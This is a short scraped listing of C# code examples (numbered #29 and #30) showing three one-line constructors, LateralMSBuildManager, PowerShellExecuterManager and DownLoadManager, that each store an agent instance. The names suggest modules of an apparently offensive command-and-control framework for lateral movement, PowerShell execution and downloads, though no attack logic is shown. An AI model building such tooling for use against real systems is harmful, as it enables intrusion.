 public LateralMSBuildManager(IAgentInstance agent) => this.agent = agent;
Exemple #29
 /// <summary>Creates the manager and stores the agent instance it operates on.</summary>
 /// <param name="agent">Agent instance kept in the <c>agent</c> field.</param>
 public PowerShellExecuterManager(IAgentInstance agent) => this.agent = agent;
Exemple #30
 /// <summary>Creates the manager and stores the agent instance it operates on.</summary>
 /// <param name="agent">Agent instance kept in the <c>agent</c> field.</param>
 public DownLoadManager(IAgentInstance agent) => this.agent = agent;